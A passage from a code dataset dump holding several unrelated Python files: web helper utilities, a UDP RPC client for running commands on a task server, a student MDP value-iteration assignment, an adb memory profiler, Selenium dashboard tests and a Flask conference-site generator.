\")\n curentUrl = url.current()\n if len(link) > 0:\n for item in link:\n urlLink = curentUrl +\"/\"+ item.strftime(\"%Y-%m-%d-%H-%M-%S\")\n urlLink = '' + oldRulesTitle + ' ' + item.strftime(\"%Y-%m-%d %H:%M:%S\") + ''\n rulesLink.append(\"\")\n rulesLink.append(urlLink)\n rulesLink.append(\"\")\n else:\n urlLink = curentUrl[0:(curentUrl.lower().find('/rules') + 6)]\n urlLink = '' + curentRulesTitle + ''\n rulesLink.append(\"\")\n rulesLink.append(urlLink)\n rulesLink.append(\"\")\n rulesLink.append(\"
\")\n rulesLink = \" \".join(rulesLink)\n return rulesLink\ndef JSON(obj):\n \"\"\"Возвращает JSON-представление объекта obj\"\"\"\n return json.dumps(obj, ensure_ascii=False)\n\ndef jgridDataWrapper(data, page=None, records_on_page=None, count=None, total_pages=None,\n json=True):\n \"\"\" Принимает список значений колонок и возвращает json для таблиц jqGrid.\n Строит пейджинг по массиву данных или передает параметры пейджинга передаваемые\n ему на вход (при условии организации пейджинга с учётом выборки с бд)\n Для организации пейджинга из массива данных можно передать параметры ``page`` -- номер\n текущей страницы, ``records_on_page`` -- количество записей на одной\n странице.\n Для организации пейджинга при условии организации с учётом выборки с бд можно передать параметры\n ``page`` -- номер текущей страницы, ``count``- колво записей, ``total_pages`` - колво страниц.\n \"\"\"\n if count is None and total_pages is None:\n records = len(data)\n if page is not None and records_on_page is not None:\n try:\n page = int(page)\n except ValueError:\n page = 1\n\n try:\n records_on_page = int(records_on_page)\n except ValueError:\n records_on_page = 20\n\n if page == 0:\n page = 1\n start_record = (page - 1) * records_on_page\n end_record = page * records_on_page\n total_pages = (records-1) / records_on_page + 1\n data = data[start_record:end_record]\n records = len(data)\n else:\n if records:\n total_pages = page = 1\n else:\n total_pages = page = 0\n else:\n records = int(count)\n try:\n total_pages = int(total_pages)\n except ValueError:\n total_pages = 1\n try:\n page = int(page)\n except ValueError:\n page = 1\n \n output = {'total': total_pages,\n 'page': page,\n 'records': records,\n 'rows': [{'cell': x, 'id': index + 1}\n for index,x in enumerate(data)]\n }\n return JSON(output) if json else output\ndef trim_by_words(str, max_len):\n ''' Обрезает строку ``str`` до длины не более ``max_len`` с учётом слов '''\n if len(str) <= max_len:\n return str\n trimmed_simple = str[:max_len]\n trimmed_by_words = trimmed_simple.rpartition(' ')[0]\n return u'%s…' % (trimmed_by_words or trimmed_simple)\n","sub_path":"help/1.0/help/lib/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":5844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"435807959","text":"#!/usr/bin/env python3\n\nimport argparse\nimport asyncio\nimport os\nimport sys\n\nfrom rpcudp.protocol import RPCProtocol\n\nreturn_code = 1 # by default assume there was a problem invoking the remote task\n\n\n# A custom asyncio protocol used for capturing stdin of the Python process\nclass StdinCaptureProtocol(asyncio.Protocol):\n def __init__(self, protocol, host):\n self.protocol = protocol\n self.host = host\n\n def data_received(self, data):\n self.protocol.consume_input(self.host, data)\n\n def connection_lost(self, exc):\n self.protocol.consume_input(self.host, str.encode('\\4')) # End Of Transmission (EOT) character\n super().connection_lost(exc)\n\n\n# Any methods starting with \"rpc_\" are available to clients.\nclass RPCServer(RPCProtocol):\n def rpc_consume_stdout(self, sender, output):\n print(output.decode(\"utf-8\").rstrip('\\n'), flush=True)\n\n def rpc_consume_stderr(self, sender, output):\n print(output.decode(\"utf-8\").rstrip('\\n'), file=sys.stderr, flush=True)\n\n def rpc_consume_return_code(self, sender, retval):\n global return_code\n return_code = retval\n loop.stop()\n\n\nasync def exec_shell(protocol, address, command):\n await 
protocol.exec_shell(address, command)\n\nparser = argparse.ArgumentParser()\nparser.add_argument('command', help='shell command to run on the remote server')\nparser.add_argument('--host-address',\n help='Address of the RPC server. Defaults to 127.0.0.1 or RTASK_HOST_ADDRESS environment variable (if set).',\n default=os.environ.get('RTASK_HOST_ADDRESS', '127.0.0.1'))\nparser.add_argument('--host-port', type=int,\n help='Port of the server. Defaults to 1234 or RTASK_HOST_PORT environment variable (if set).',\n default=os.environ.get('RTASK_HOST_PORT', 1234))\nparser.add_argument('--client-address',\n help='Address of the RPC client. Defaults to 127.0.0.1 or RTASK_CLIENT_ADDRESS environment variable (if set).',\n default=os.environ.get('RTASK_CLIENT_ADDRESS', '127.0.0.1'))\nparser.add_argument('--client-port', type=int,\n help='Port of the client. Defaults to OS-chosen or RTASK_CLIENT_PORT environment variable (if set).',\n default=os.environ.get('RTASK_CLIENT_PORT', None))\nargs = parser.parse_args()\n\n\n# Start local UDP server to be able to handle responses\nloop = asyncio.get_event_loop()\nlisten = loop.create_datagram_endpoint(RPCServer, local_addr=(args.client_address, args.client_port))\ntransport, protocol = loop.run_until_complete(listen)\n\n# Call remote UDP server to say hi\ncoroutine = exec_shell(protocol, (args.host_address, args.host_port), args.command)\nloop.run_until_complete(coroutine)\nloop.run_until_complete(loop.connect_read_pipe(lambda: StdinCaptureProtocol(protocol, (args.host_address, args.host_port)), sys.stdin))\nloop.run_forever()\nsys.exit(return_code)\n","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"518537757","text":"import numpy as np\r\nfrom vi_util import getIndexOfState, getPolicyForGrid, printPolicyForGrid, P\r\n\r\n\r\n#### Initialization ####\r\n\r\n\r\nclass State:\r\n def __init__(self, x, y):\r\n self.x = x\r\n self.y = y\r\n\r\n\r\n### value iteration inputs ###\r\nS = [State(1, 1), State(1, 2), State(1, 3), State(1, 4),\r\n State(2, 1), State(2, 3), State(2, 4),\r\n State(3, 1), State(3, 2), State(3, 3), State(3, 4)]\r\n\r\nA = ['u', 'r', 'd', 'l']\r\n\r\nP = P\r\n\r\n# make a version of R_states with changeable rewards\r\nR_states = np.array([-.04, -.04, -.04, 1,\r\n -.04, -.04, -1,\r\n -.04, -.04, -.04, -.04])\r\n\r\n# make a version of discount with changeable discount\r\ndiscount = 1\r\n\r\n# values not reward\r\ntr = [3, 6]\r\n\r\nU = np.array([0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.0, 0.0, 0.0, 0.0, 1.0])\r\n\r\nU_prime = np.array([0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.0, 0.0, 0.0, 0.0, 1.0])\r\n\r\nU.astype(float)\r\nU_prime.astype(float)\r\n\r\n\r\ndef getExpectedUtility(S, s, discount):\r\n \"\"\"\r\n\r\n :param S:\r\n :param s:\r\n :param discount:\r\n :return:\r\n \"\"\"\r\n index_of_state = getIndexOfState(S, s.x, s.y)\r\n\r\n if index_of_state == 0:\r\n uP = R_states[index_of_state] + (discount * max(.8 * U[1] + .1 * U[4] + .1 * U[0], # up\r\n .9 * U[0] + .1 * U[1], # left\r\n .9 * U[0] + .1 * U[4], # down\r\n .8 * U[4] + .1 * U[1] + .1 * U[0])) # right\r\n if index_of_state == 1:\r\n uP = R_states[index_of_state] + (discount * max(.8 * U[1] + .1 * U[2] + .1 * U[0], # up\r\n .9 * U[0] + .1 * U[2], # left\r\n .8 * U[1] + .1 * U[0] + .1 * U[2], # down\r\n .9 * U[2] + .1 * U[0])) # right\r\n if index_of_state == 2:\r\n uP = R_states[index_of_state] + (discount * max(.8 * U[5] + .1 * U[1] + .1 * U[3], # 
up\r\n .9 * U[1] + .1 * U[5], # left\r\n .8 * U[2] + .1 * U[1] + .1 * U[3], # down\r\n .9 * U[3] + .1 * U[5])) # right\r\n if index_of_state == 3:\r\n uP = R_states[index_of_state] + (discount * max(.8 * U[6] + .1 * U[2] + .1 * U[3], # up\r\n .9 * U[2] + .1 * U[6], # left\r\n .9 * U[3] + .1 * U[6], # down\r\n .9 * U[3] + .1 * U[2], )) # right\r\n if index_of_state == 4:\r\n uP = R_states[index_of_state] + (discount * max(.8 * U[7] + .1 * U[4] + .1 * U[0], # up\r\n .8 * U[4] + .1 * U[7] + .1 * U[0], # left\r\n .8 * U[4] + .1 * U[7] + .1 * U[0], # right\r\n .8 * U[0] + .1 * U[4] + .1 * U[7])) # down\r\n if index_of_state == 5:\r\n uP = R_states[index_of_state] + (discount * max(.8 * U[9] + .1 * U[6] + .1 * U[5], # up\r\n .8 * U[5] + .1 * U[9] + .1 * U[2], # left\r\n .8 * U[6] + .1 * U[9] + .1 * U[2], # right\r\n .8 * U[2] + .1 * U[5] + .1 * U[5])) # down\r\n if index_of_state == 6: # terminate ?\r\n uP = R_states[index_of_state] + (discount * max(.8 * U[10] + .1 * U[4] + .1 * U[0], # up\r\n .9 * U[5] + .1 * U[1], # left\r\n .9 * U[0] + .1 * U[4], # down\r\n .8 * U[4] + .1 * U[1] + .1 * U[0])) # right\r\n if index_of_state == 7:\r\n uP = R_states[index_of_state] + (discount * max(.8 * U[7] + .1 * U[8] + .1 * U[4], # up\r\n .9 * U[7] + .1 * U[4], # left\r\n .8 * U[4] + .1 * U[8] + .1 * U[7], # down\r\n .8 * U[8] + .1 * U[7] + .1 * U[4])) # right\r\n if index_of_state == 8:\r\n uP = R_states[index_of_state] + (discount * max(.8 * U[7] + .1 * U[8] + .1 * U[9], # left\r\n .8 * U[8] + .1 * U[7] + .1 * U[9], # up\r\n .8 * U[9] + .1 * U[8] + .1 * U[7], # right\r\n .8 * U[8] + .1 * U[7] + .1 * U[9])) # down\r\n if index_of_state == 9:\r\n uP = R_states[index_of_state] + (discount * max(.8 * U[9] + .1 * U[8] + .1 * U[10], # up\r\n .9 * U[8] + .1 * U[9], # left\r\n .9 * U[5] + .1 * U[9], # down\r\n .8 * U[10] + .1 * U[5] + .1 * U[9])) # right\r\n if index_of_state == 10: # terminate\r\n uP = R_states[index_of_state] + (discount * max(.8 * U[10] + .1 * U[9] + .1 * U[6], # up\r\n .9 * U[9] + .1 * U[10], # left\r\n .9 * U[6] + .1 * U[10], # down\r\n .9 * U[10] + .1 * U[6])) # right\r\n return uP\r\n\r\n\r\ndef valueIterations(S, A, P, R_states, discount, tr, error):\r\n \"\"\"\r\n :param S:\r\n :param A:\r\n :param P:\r\n :param R_states:\r\n :param discount:\r\n :param tr:\r\n :return:\r\n \"\"\"\r\n U = np.array([0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.0, 0.0, 0.0, 0.0, 1.0])\r\n U_prime = np.array([0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.0, 0.0, 0.0, 0.0, 1.0])\r\n\r\n U.astype(float)\r\n U_prime.astype(float)\r\n\r\n convergence = False\r\n i = 0\r\n oldV = []\r\n count = 0\r\n while not convergence:\r\n delta = -100 # arbitrary number\r\n count += 1\r\n U = U_prime # change old U to new U\r\n for s in S: # for state in state list\r\n i += 1 # iterate the counter\r\n oldV.append(s) # add old state to old states list\r\n uP = getExpectedUtility(S, s, discount) # get utility of state\r\n U_prime[getIndexOfState(S, s.x, s.y)] = uP\r\n\r\n #print((U_prime[getIndexOfState(S, s.x, s.y)])) # test\r\n #print(U[getIndexOfState(S, s.x, s.y)]) # test\r\n\r\n if (U_prime[getIndexOfState(S, s.x, s.y)] - U[getIndexOfState(S, s.x, s.y)]) > delta: # calculate the difference\r\n delta = U_prime[getIndexOfState(S, s.x, s.y)] - U[getIndexOfState(S, s.x, s.y)] # if the difference is greater replace delta\r\n\r\n if delta < .000001: # .000001 is placeholder value\r\n convergence = True\r\n\r\n return U\r\n\r\n\r\n#### Below is provided by class ####\r\n\r\ndef main():\r\n # Call value iteration function\r\n U = valueIterations(S, A, P, 
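# note: the tr and error arguments are accepted but currently unused inside valueIterations\r\n 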
R_states, discount, tr, 2)\r\n print('\\n\\n\\n')\r\n print('Utilities: \\n%s' % U)\r\n\r\n # List of terminal state indices\r\n i_terminal_states = [6, 10]\r\n\r\n policy = getPolicyForGrid(S, U, A, P, i_terminal_states)\r\n print('Policy: %s' % policy)\r\n\r\n # Print the policy\r\n # Last parameter is list of obstacle indices\r\n # printPolicyForGrid(policy, w, h, [5])\r\n\r\n\r\nmain()\r\n","sub_path":"Artificial Intelligence HW/Value Iteration for an MDP/YoxsimerThomasMDP.py","file_name":"YoxsimerThomasMDP.py","file_ext":"py","file_size_in_byte":7620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"553023668","text":"#cd /Users/panluobu/Documents/Mem\r\n#python memp.py\r\nimport re\r\nimport os\r\nimport sys\r\nimport time\r\nimport matplotlib.pyplot as plt\r\n\r\ndef get(msg):\r\n PN = input(msg)\r\n if PN=='':\r\n PN = 'com.panda.unity.blastsaga'\r\n return PN\r\n\r\nPackName = get(\"please input Packname:\")\r\nsquares = []\r\nsquares1 = []\r\n\r\nmins = 0\r\nsec = 10\r\n\r\nfor i in range(60*mins + sec):\r\n# print(\"adb shell dumpsys meminfo \" + PackName)\r\n content = os.popen(\"adb shell dumpsys meminfo \" + PackName).read() \r\n string = str(content)\r\n f2 = open(\"memp.txt\", 'r+')\r\n f2.seek(0, os.SEEK_END) \r\n\r\n result0 = re.findall(\".*TOTAL:(.*)TOTAL.*\", string)\r\n result1 = ''.join(result0)\r\n\r\n result2 = re.compile(r' ')\r\n result3 = result2.sub('', str(result1))\r\n result = ''.join(result3)\r\n\r\n squares.append(result)\r\n\r\n for y in result:\r\n s = str(y)\r\n f2.write(s)\r\n f2.write('\\n')\r\n f2.close()\r\n print (str(i) + '. ' +result)\r\n time.sleep(1) \r\n\r\nfor s in squares:\r\n s1 = int(int(s)/1024)\r\n print(s1)\r\n squares1.append(s1)\r\n\r\nplt.title(PackName)\r\nplt.xlabel(\"Time\")\r\nplt.ylabel(\"Men\")\r\n#plt.xlim(0, 60*mins+sec-1)\r\nplt.ylim(0, 500)\r\nplt.plot(squares1)\r\nplt.show()\r\n\r\nprint (\"ok\")","sub_path":"mem-master.py","file_name":"mem-master.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"50034009","text":"from ui.zbUIShared import clickSpecificTimerange\nimport sys, os, pytest\n\ntry:\n zbathome = os.environ['ZBAT_HOME']\nexcept:\n print('Test cannot run. 
Please export ZBAT_HOME.')\n sys.exit()\n\nif zbathome+'lib' not in sys.path:\n sys.path.append(zbathome+'lib')\n\nfrom ui.dashboard.zbUIDashboardSummary import DashboardSummary\nfrom common.zbSelenium import zbSelenium\nfrom common.zbCommon import rerunIfFail\nfrom common.zbConfig import NUMBER_RETRIES, DELAY_SECONDS, SCREENSHOT_ON_FAIL\nimport logging\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n# fixture\n@pytest.fixture(scope=\"module\")\ndef browser(browser_factory):\n browser = browser_factory(DashboardSummary)\n return browser[\"selenium\"]\n\n@pytest.mark.smoke\n@pytest.mark.parametrize(\"testid\", [\"C363021\"])\ndef test_global_filters(testid, browser):\n \"\"\" Smoke -- Verify Global Filters elements appear \"\"\"\n assert rerunIfFail(function=browser.verifyGlobalFilters(), selenium=browser.selenium, \\\n number=NUMBER_RETRIES, delay=DELAY_SECONDS) == True\n\n@pytest.mark.bugs\n@pytest.mark.regression\n@pytest.mark.parametrize(\"testid\", [\"C360806\"])\ndef test_global_filters_reg(testid, browser):\n \"\"\" Regression -- Verify selecting different Global Filters changes values in Top Bar Widget \"\"\"\n assert rerunIfFail(function=browser.verifyGlobalFiltersOnTopBar(), selenium=browser.selenium, \\\n number=NUMBER_RETRIES, delay=DELAY_SECONDS) == True\n\n@pytest.mark.regression\n@pytest.mark.parametrize(\"testid\", [\"C360814\"])\ndef test_dashboard_summary_protocols(testid, browser):\n assert rerunIfFail(function=browser.regDashboardSummaryProtocols(), selenium=browser.selenium, \\\n number=NUMBER_RETRIES, delay=DELAY_SECONDS) == True\n\n@pytest.mark.parametrize(\"testid\", [\"C360807\"])\n@pytest.mark.regression\ndef test_dashboard_summary_apps(testid, browser):\n assert rerunIfFail(function=browser.regDashboardSummaryApplications(), selenium=browser.selenium, \\\n number=NUMBER_RETRIES, delay=DELAY_SECONDS) == True\n\n@pytest.mark.parametrize(\"testid\", [\"C360820\"])\n@pytest.mark.regression\ndef test_dashboard_summary_networks(testid, browser):\n assert rerunIfFail(function=browser.regDashboardSummaryNetworks(), selenium=browser.selenium, \\\n number=NUMBER_RETRIES, delay=DELAY_SECONDS) == True\n\n@pytest.mark.parametrize(\"testid\", [\"C360821\"])\n@pytest.mark.regression\ndef test_dashboard_summary_vuln(testid, browser):\n assert rerunIfFail(function=browser.regDashboardSummaryVuln(), selenium=browser.selenium, \\\n number=NUMBER_RETRIES, delay=DELAY_SECONDS) == True\n\n@pytest.mark.parametrize(\"testid\", [\"C360822\"])\n@pytest.mark.regression\ndef test_dashboard_summary_alerts(testid, browser):\n assert rerunIfFail(function=browser.regDashboardSummaryAlerts(), selenium=browser.selenium, \\\n number=NUMBER_RETRIES, delay=DELAY_SECONDS) == True\n\n@pytest.mark.parametrize(\"testid\", [\"C360823\"])\n@pytest.mark.regression\ndef test_dashboard_summary_risks(testid, browser):\n assert rerunIfFail(function=browser.regDashboardSummaryRisks(), selenium=browser.selenium, \\\n number=NUMBER_RETRIES, delay=DELAY_SECONDS) == True\n\n@pytest.mark.parametrize(\"testid\", [\"C360805\"])\n@pytest.mark.regression\ndef test_dashboard_summary_reg(testid, browser):\n clickSpecificTimerange(browser.selenium, specific=\"1 Month\")\n assert rerunIfFail(function=browser.checkTopBar(), selenium=browser.selenium, \\\n number=NUMBER_RETRIES, delay=DELAY_SECONDS) == True\n clickSpecificTimerange(browser.selenium, specific=\"1 Month\")\n assert rerunIfFail(function=browser.checkDeviceCard(), selenium=browser.selenium, \\\n number=NUMBER_RETRIES, 
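# NUMBER_RETRIES and DELAY_SECONDS are the shared retry knobs imported from common.zbConfig\n 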
delay=DELAY_SECONDS) == True\n clickSpecificTimerange(browser.selenium, specific=\"1 Month\")\n assert rerunIfFail(function=browser.checkSiteCard(), selenium=browser.selenium, \\\n number=NUMBER_RETRIES, delay=DELAY_SECONDS) == True\n\n@pytest.mark.parametrize(\"testid\", [\"C360802\"])\n@pytest.mark.smoke\n@pytest.mark.parametrize(\"test_id\", [(\"TC_DASHBOARD_001::Smoke::Verify Dashboard Summary Page\")])\ndef test_dashboard_summary(testid, test_id, browser):\n \"\"\" Smoke -- Verify all the items in Dashboard Summary Page can be loaded \"\"\"\n clickSpecificTimerange(browserobj=browser.selenium, specific=\"1 Month\")\n assert rerunIfFail(function=browser.verifyDashboardSummaryTop(), selenium=browser.selenium, \\\n number=NUMBER_RETRIES, delay=DELAY_SECONDS) == True\n assert rerunIfFail(function=browser.verifyDashboardSummaryGeneral(), selenium=browser.selenium, \\\n number=NUMBER_RETRIES, delay=DELAY_SECONDS) == True\n assert rerunIfFail(function=browser.verifyDashboardSummaryDevices(), selenium=browser.selenium, \\\n number=NUMBER_RETRIES, delay=DELAY_SECONDS) == True\n assert rerunIfFail(function=browser.verifyDashboardSummarySites(), selenium=browser.selenium, \\\n number=NUMBER_RETRIES, delay=DELAY_SECONDS) == True\n assert rerunIfFail(function=browser.verifyDashboardSummaryApplications(), selenium=browser.selenium, \\\n number=NUMBER_RETRIES, delay=DELAY_SECONDS) == True\n assert rerunIfFail(function=browser.verifyDashboardSummaryProtocols(), selenium=browser.selenium, \\\n number=NUMBER_RETRIES, delay=DELAY_SECONDS) == True \n assert rerunIfFail(function=browser.verifyDashboardSummaryNetworkSegments(), selenium=browser.selenium, \\\n number=NUMBER_RETRIES, delay=DELAY_SECONDS) == True\n assert rerunIfFail(function=browser.verifyDashboardSummaryAlerts(), selenium=browser.selenium, \\\n number=NUMBER_RETRIES, delay=DELAY_SECONDS) == True\n assert rerunIfFail(function=browser.verifyDashboardSummaryVulnerabilities(), selenium=browser.selenium, \\\n number=NUMBER_RETRIES, delay=DELAY_SECONDS) == True\n assert rerunIfFail(function=browser.verifyDashboardSummaryRiskOverview(), selenium=browser.selenium, \\\n number=NUMBER_RETRIES, delay=DELAY_SECONDS) == True\n","sub_path":"tests/ui/test_dashboard_summary.py","file_name":"test_dashboard_summary.py","file_ext":"py","file_size_in_byte":5984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"101981287","text":"# pylint: disable=global-statement,redefined-outer-name\nimport argparse\nimport collections\nimport csv\nimport glob\nimport json\nimport os\n\nimport dateutil.parser\nimport yaml\nfrom flask import Flask, jsonify, redirect, render_template, send_from_directory\nfrom flask_frozen import Freezer\nfrom flaskext.markdown import Markdown\nfrom flask_minify import minify\n\n\nsite_data = {}\nby_uid = {}\nby_day = {}\nby_time = {}\n\ndef main(site_data_path):\n global site_data, extra_files\n extra_files = [\"README.md\"]\n # Load all for your sitedata one time.\n for f in glob.glob(site_data_path + \"/*\"):\n extra_files.append(f)\n name, typ = f.split(\"/\")[-1].split(\".\")\n if typ == \"json\":\n site_data[name] = json.load(open(f))\n elif typ in {\"csv\", \"tsv\"}:\n site_data[name] = list(csv.DictReader(open(f, encoding='utf-8-sig')))\n elif typ == \"yml\":\n site_data[name] = yaml.load(open(f).read(), Loader=yaml.SafeLoader)\n\n for typ in [\"paper_list\", \"speakers\", \"workshops\", \"session_list\"]:\n by_uid[typ] = {}\n\n if typ == \"session_list\":\n by_uid[\"events\"] = 
{}\n by_uid[\"sessions\"] = {}\n\n for session_id, p in site_data[typ].items():\n by_uid[\"events\"][session_id] = p\n\n # also iterate through each session within each event\n for timeslot in p[\"sessions\"]:\n # also put some parent info back into this item\n fq_timeslot = timeslot.copy()\n fq_timeslot.update({\n \"event\": p[\"event\"],\n \"event_type\": p[\"event_type\"],\n \"parent_id\": session_id,\n \"event_description\": p[\"event_description\"],\n \"event_url\": p[\"event_url\"],\n })\n\n by_uid['sessions'][timeslot['session_id']] = fq_timeslot\n\n by_uid[\"sessions\"][timeslot[\"session_id\"]] = fq_timeslot\n\n elif typ == \"paper_list\":\n for paper_id, p in site_data[typ].items():\n by_uid[typ][paper_id] = p\n\n else:\n for p in site_data[typ]:\n by_uid[typ][p[\"UID\"]] = p\n\n # organize sessions by day (calendar)\n for session in by_uid[\"sessions\"].values():\n this_date = dateutil.parser.parse(session[\"time_start\"])\n day = this_date.strftime(\"%A\")\n if day not in by_day:\n by_day[day] = []\n\n by_day[day].append(format_by_session_list(session))\n\n # organize sessions by timeslot (linking simultaneous sessions together)\n for day, day_sessions in by_day.items():\n time_sessions = {}\n for session in day_sessions:\n timeslot = session[\"startTime\"] + \"|\" + session[\"endTime\"]\n if timeslot not in time_sessions:\n this_date = dateutil.parser.parse(session[\"startTime\"])\n time_sessions[timeslot] = {\n \"sessions\": [],\n \"date\": this_date.strftime(\"%A, %d %b %Y\"),\n \"startTime\": session[\"startTime\"],\n \"endTime\": session[\"endTime\"],\n }\n\n time_sessions[timeslot][\"sessions\"].append(session)\n\n by_time[day] = collections.OrderedDict(sorted(time_sessions.items()))\n\n ## TODO: add paper information to session information\n\n print(\"Data Successfully Loaded\")\n return extra_files\n\n\n# main() should be called before this function\ndef generateDayCalendars():\n if len(by_day) == 0:\n raise Exception(\"call main() before this function\")\n\n all_events = []\n for day in by_day:\n day_events = []\n for session in by_day[day]:\n session_event = {\n \"id\": session[\"id\"],\n \"title\": session[\"fullTitle\"],\n \"start\": session[\"calendarDisplayStartTime\"],\n \"realStart\": session[\"startTime\"],\n \"end\": session[\"endTime\"],\n # \"location\": session['youtube'],\n \"location\": \"/session_\" + session[\"id\"] + \".html\",\n \"link\": \"http://virtual.ieeevis.org/session_\" + session[\"id\"] + \".html\",\n \"category\": \"time\",\n \"calendarId\": session[\"type\"],\n }\n day_events.append(session_event)\n\n calendar_fname = \"calendar_\" + day + \".json\"\n # full_calendar_fname = os.path.join(site_data_path, calendar_fname)\n # with open(full_calendar_fname, 'w', encoding='utf-8') as f:\n # json.dump(day_events, f, ensure_ascii=False, indent=2)\n\n # try ordering by title; maybe this'll make things line up in the calendar?\n day_events = sorted(day_events, key=lambda event: event['title'])\n\n site_data[calendar_fname] = day_events\n all_events.extend(day_events)\n\n # for the purposes of simplifying the main schedule, group by start/end times; merge times together; make location the appropriate tab\n # aggregated_events = []\n # timeslots = set(map(lambda event: event['start'] + \"|\" + event['end'], day_events))\n # for timeslot in timeslots:\n # timeslot_events = []\n # for event in day_events:\n # timeslot_string = event['start']+ \"|\" + event['end']\n # if timeslot_string == timeslot:\n # timeslot_events.append(event)\n\n # agg_event = {\n 
# \"id\": timeslot,\n # \"title\": \", \".join(map(lambda event: event['title'], timeslot_events)),\n # \"start\": session['startTime'],\n # \"end\": session['endTime'],\n # # \"location\": session['youtube'],\n # \"location\": \"#tab-\" + day,\n # \"link\": \"http://virtual.ieeevis.org/schedule.html#tab-\" + day + \".html\",\n # \"category\": \"time\",\n # \"calendarId\": \"\",\n # }\n # aggregated_events.append(agg_event)\n\n # all_events.extend(aggregated_events)\n\n # overwrite static main_calendar json with all assembled events\n site_data[\"main_calendar\"] = all_events\n\n\n# ------------- SERVER CODE -------------------->\n\napp = Flask(__name__)\napp.config.from_object(__name__)\nfreezer = Freezer(app)\nmarkdown = Markdown(app)\n\n\n# MAIN PAGES\n\n\ndef _data():\n data = {}\n data[\"config\"] = site_data[\"config\"]\n return data\n\n\n@app.route(\"/\")\ndef index():\n return redirect(\"/index.html\")\n\n\n@app.route(\"/favicon.png\")\ndef favicon():\n return send_from_directory(site_data_path, \"favicon.png\")\n\n\n# TOP LEVEL PAGES\n\n\n@app.route(\"/index.html\")\ndef home():\n data = _data()\n data[\"readme\"] = open(\"README.md\").read()\n data[\"supporters\"] = site_data[\"supporters\"]\n return render_template(\"index.html\", **data)\n\n\n@app.route(\"/help.html\")\ndef about():\n data = _data()\n data[\"discord\"] = open(\"discord_guide.md\").read()\n data[\"FAQ\"] = site_data[\"faq\"][\"FAQ\"]\n return render_template(\"help.html\", **data)\n\n\n@app.route(\"/papers.html\")\ndef papers():\n data = _data()\n # data[\"papers\"] = site_data[\"papers\"]\n return render_template(\"papers.html\", **data)\n\n\n@app.route(\"/paper_vis.html\")\ndef paper_vis():\n data = _data()\n return render_template(\"papers_vis.html\", **data)\n\n\n@app.route(\"/calendar.html\")\ndef schedule():\n data = _data()\n\n data[\"days\"] = {}\n for day in by_day:\n data[\"days\"][day] = {\"timeslots\": by_time[day]}\n\n return render_template(\"schedule.html\", **data)\n\n\n@app.route(\"/events.html\")\ndef events():\n data = _data()\n all_events = [format_session_as_event(event_item, event_uid) for event_uid, event_item in by_uid['events'].items()]\n data['events'] = sorted(all_events, key=lambda e: e['abbr_type'])\n data['event_types'] = sorted(list(set([(e['type'], e[\"abbr_type\"]) for e in all_events])), key=lambda x: x[0])\n data['colors'] = data['config']['calendar']['colors']\n return render_template(\"events.html\", **data)\n\n\n# ALPER TODO: we should just special-case particular sessions and render them under this route\n@app.route(\"/workshops.html\")\ndef workshops():\n data = _data()\n data[\"workshops\"] = [\n format_workshop(workshop) for workshop in site_data[\"workshops\"]\n ]\n return render_template(\"workshops.html\", **data)\n\n\ndef extract_list_field(v, key):\n value = v.get(key, \"\")\n if isinstance(value, list):\n return value\n if value.find(\"|\") != -1:\n return value.split(\"|\")\n else:\n return value.split(\",\")\n\n\ndef format_paper(v):\n list_keys = [\"authors\", \"keywords\"]\n list_fields = {}\n for key in list_keys:\n list_fields[key] = extract_list_field(v, key)\n\n paper_session = by_uid[\"sessions\"][v[\"session_id\"]]\n paper_event = by_uid[\"events\"][paper_session[\"parent_id\"]]\n\n return {\n \"id\": v[\"uid\"],\n \"title\": v[\"title\"],\n \"authors\": list_fields[\"authors\"],\n \"keywords\": list_fields[\"keywords\"],\n \"abstract\": v[\"abstract\"],\n \"time_stamp\": v[\"time_stamp\"],\n \"session_id\": v[\"session_id\"],\n \"session_title\": 
paper_session[\"title\"],\n \"event_id\": paper_session[\"parent_id\"],\n \"event_title\": paper_event[\"event\"],\n \"award\": v[\"paper_award\"],\n \"has_image\": v[\"has_image\"],\n \"image_caption\": v[\"image_caption\"],\n \"external_paper_link\": v[\"external_paper_link\"],\n \"youtube_ff_url\": v[\"ff_link\"],\n \"youtube_ff_id\": v[\"ff_link\"].split(\"/\")[-1] if v[\"ff_link\"] else None,\n\n # for papers.html:\n \"sessions\": [paper_session[\"title\"]],\n \"UID\": v[\"uid\"],\n }\n\n\ndef format_paper_list(v):\n list_keys = [\"authors\"]\n list_fields = {}\n for key in list_keys:\n list_fields[key] = extract_list_field(v, key)\n\n return {\n \"id\": v[\"uid\"],\n \"title\": v[\"title\"],\n \"authors\": list_fields[\"authors\"],\n \"award\": v[\"paper_award\"],\n ## eventually, FF/DOI?\n }\n\n\n## new format for paper_list.json\n# def format_paper_list(v):\n# return {\n# \"id\": v['uid'],\n# \"forum\": v['uid'].split('-')[1],\n# \"content\": {\n# \"title\": v[\"title\"],\n# \"authors\": v[\"authors\"],\n# \"session\": v[\"session_id\"],\n# \"time_stamp\": v[\"time_stamp\"],\n# }\n# }\n\n\ndef format_workshop(v):\n list_keys = [\"authors\"]\n list_fields = {}\n for key in list_keys:\n list_fields[key] = extract_list_field(v, key)\n\n return {\n \"id\": v[\"UID\"],\n \"title\": v[\"title\"],\n \"organizers\": list_fields[\"authors\"],\n \"abstract\": v[\"abstract\"],\n }\n\n\ndef format_session_as_event(v, uid):\n list_keys = ['Organizers']\n list_fields = {}\n for key in list_keys:\n list_fields[key] = extract_list_field(v, key)\n\n return {\n \"id\": uid,\n \"title\": v[\"long_name\"],\n \"type\": v[\"event_type\"],\n \"abbr_type\": v[\"event_type\"].split(\" \")[0].lower(),\n \"abstract\": v[\"event_description\"],\n \"url\": v[\"event_url\"],\n \"startTime\": 